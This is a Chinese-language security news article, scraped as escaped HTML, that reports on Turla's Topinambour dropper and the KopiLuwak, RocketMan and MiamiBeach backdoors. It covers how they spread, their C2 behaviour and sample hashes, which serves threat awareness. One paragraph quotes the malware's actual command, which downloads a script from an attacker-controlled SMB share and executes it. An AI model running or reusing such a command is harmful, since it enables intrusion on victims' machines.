"\u003Cdiv\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp1.pstatp.com\u002Flarge\u002Fpgc-image\u002F222fb726ea124caaa7b7e081b64aec59\" img_width=\"1200\" img_height=\"675\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003ETurla，也被稱爲Venomous Bear、Waterbug或Uroboros，據稱是一個自2014年開始表現活躍的俄羅斯黑客組織。不過，卡巴斯基實驗室安全研究人員的分析表明，該組織早期的攻擊活動可以追溯到2004年，主要攻擊目標是中東、歐洲、北美和南美以及前蘇聯國家的外交和政府組織。\u003C\u002Fp\u003E\u003Cp\u003E2019年，Turla仍在持續不斷地使用類似的代碼風格開發新的攻擊工具，其中就包括了一款被命名爲“Topinambour”的.NET惡意軟件（被用作dropper），它主要被用來傳播一種此前已經被公開披露過的後門木馬——KopiLuwak（採用JavaScript編寫）。\u003C\u002Fp\u003E\u003Cp\u003E不僅如此，在攻擊者藉助Topinambour傳播的惡意軟件中，安全研究人員還發現了兩種與KopiLuwak非常相似的後門木馬——RocketMan和MiamiBeach。不同之處在於，RocketMan是採用.NET 編寫的，而MiamiBeach是採用PowerShell編寫的。\u003C\u002Fp\u003E\u003Cp\u003E在Topinambour命令和控制（C2）服務器的選擇方面，Turla使用了許多被黑掉的合法WordPress網站。在這些網站上，安全研究人員都發現了一個相同的惡意.php腳本。\u003C\u002Fp\u003E\u003Ch1\u003E惡意軟件的傳播方式\u003C\u002Fh1\u003E\u003Cp\u003ETopinambour包含一個小型的.NET shell，用於從C2服務器接收來自攻擊者的Windows shell命令。爲了讓攻擊目標感染Topinambour，攻擊者將它與合法的軟件安裝包捆綁在了一起，比如Softether VPN 4.12、psiphon3和Windows office激活器。\u003C\u002Fp\u003E\u003Cp\u003E一旦這些惡意軟件安裝包被安裝，攻擊者就可以通過發送類似於“net use”或“copy”這樣的簡單Windows shell命令，來下載託管在租用的虛擬專用服務器（VPS）上並通過SMB共享的下一階段惡意軟件。\u003C\u002Fp\u003E\u003Cp\u003E分析顯示，在攻擊活動中被使用的VPS大都位於南非，但其IP地址卻是以“197.168”開頭的，這很有可能是爲了模仿“192.168”開頭的LAN地址。進一步的分析發現，攻擊者對於IPv6協議十分熟悉。\u003C\u002Fp\u003E\u003Ch1\u003E惡意軟件都有哪些功能？\u003C\u002Fh1\u003E\u003Cp\u003E從KopiLuwak、RocketMan和MiamiBeach的功能上來看，它們都具備上傳、下載和執行文件，以及收集受感染系統基本信息的功能。此外，MiamiBeach還具備截屏功能。\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp9.pstatp.com\u002Flarge\u002Fpgc-image\u002F63ea1634051d4ffbaa6ceee8e900b589\" img_width=\"618\" img_height=\"105\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Ch1\u003E\u003Cstrong\u003E惡意軟件\u003C\u002Fstrong\u003E技術分析\u003C\u002Fh1\u003E\u003Cp\u003E\u003Cstrong\u003ETopinambour dropper\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E安全研究人員分析的Topinambour dropper樣本（SHA256：8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284；MD5：110195ff4d7298ba9a186335c55b2d1f；文件名：topinambour.exe ）實現瞭如下功能：\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp1.pstatp.com\u002Flarge\u002Fpgc-image\u002Fc61679735fd54922bb4a569a763eb654\" img_width=\"618\" img_height=\"147\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp1.pstatp.com\u002Flarge\u002Fpgc-image\u002F1cbb562c41364af282319fdada19a189\" img_width=\"1177\" img_height=\"213\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003E包含在Topinambour中的一個小型.NET shell能夠從C2服務器獲取Windows shell命令，並以靜默方式執行它們。\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp3.pstatp.com\u002Flarge\u002Fpgc-image\u002Fe4b58aa95d9c432bbe7a735675fba215\" img_width=\"965\" img_height=\"448\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003E執行Windows shell命令，會導致託管在南非的VPS上並通過SMB共享的下一階段惡意軟件KopiLuwak dropper被下載，具體命令如下：\u003C\u002Fp\u003E\u003Cp\u003Ecmd.exe \u002Fc net use \\\\197.168.0.247\\c$ \u002Fuser:administrator & copy \u002Fy \\\\197.168.0.247\\c$\\\\users\\public\\documents\\i.js $documents\\j.js & $documents\\j.js\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003EKopiLuwak dropper\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E接下來，KopiLuwak dropper會執行多個操作，具體如下：\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp3.pstatp.com\u002Flarge\u002Fpgc-image\u002F34029da15eed41b78001e713079851fd\" img_width=\"618\" img_height=\"267\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003E使用包含在新創建的計劃任務中的RC4解密密鑰，KopiLuwak dropper能夠釋放並解密另一個腳本——KopiLuwak JavaScript，它能夠從C2獲取自定義命名，以及解析並執行這些命令。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003EKopiLuwak JavaScript\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003EKopiLuwak JavaScript會從Windows註冊表中獲取一個二進制文件並執行它，如下圖所示（註冊表子項和值因攻擊目標不同會有所差異）：\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp1.pstatp.com\u002Flarge\u002Fpgc-image\u002Fbd06a9365dd2413b8624f391f4b1585f\" img_width=\"864\" img_height=\"458\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003E目前，尚不清楚Windows註冊表是怎麼創建的，但Turla通常會使用初始.NET惡意軟件（如Topinambour）來做到這一點。在部分樣本中，還存在其他的一些函數被用來獲取受感染設備的MAC地址。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E.NET RocketMan木馬\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003ERocketMan能夠從Windows註冊表中讀取C2服務器的IP地址和端口，並通過HTTP接收到的來自C2服務器的命令：\u003C\u002Fp\u003E\u003Cdiv class=\"pgc-img\"\u003E\u003Cimg src=\"http:\u002F\u002Fp1.pstatp.com\u002Flarge\u002Fpgc-image\u002Fc1360a2fc7704b6bbfdbc142bdd691cb\" img_width=\"618\" img_height=\"292\" alt=\"俄黑客組織Turla“武器庫”再升級，Topinambour病毒瞭解一下\" inline=\"0\"\u003E\u003Cp class=\"pgc-img-caption\"\u003E\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E\u003Cp\u003E\u003Cstrong\u003EPowerShell MiamiBeach木馬\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E如上所述，Turla還使用了一個PowerShell木馬。該木馬含有450個字符串，並使用TimesNewRoman作爲RC4初始向量來加密C2通信，以及使用HTTP POST和字符串MiamiBeach作爲信標來與硬編碼的C2進行通信。\u003C\u002Fp\u003E\u003Cp\u003E在功能上，MiamiBeach木馬與RocketMan非常相似，可以處理相同的命令。不同之處在於，而且MiamiBeach包含有一個額外的命令——#screen，可以實現截屏。\u003C\u002Fp\u003E\u003Ch1\u003E結論和歸因\u003C\u002Fh1\u003E\u003Cp\u003E使用PowerShell和.NET來編寫惡意軟件，攻擊者的目的顯然是爲了儘可能地繞過安全檢測。衆所周知，使用Windows註冊表來保存加密的數據，不僅能夠減少惡意軟件被殺毒軟件檢測出現的概率，而且還能夠儘可能地減少在受感染設備上留下痕跡。\u003C\u002Fp\u003E\u003Cp\u003E雖然這些惡意軟件的開發者使用了一些看似和美國存在關聯的字符串，如“RocketMan!”、“TrumpTower”、“make_some_noise”，但對KopiLuwak的使用就足證明，它與Turla組織存在關聯。\u003C\u002Fp\u003E\u003C\u002Fdiv\u003E"'.slice(6, -6), groupId: '6718550016555745803

相關文章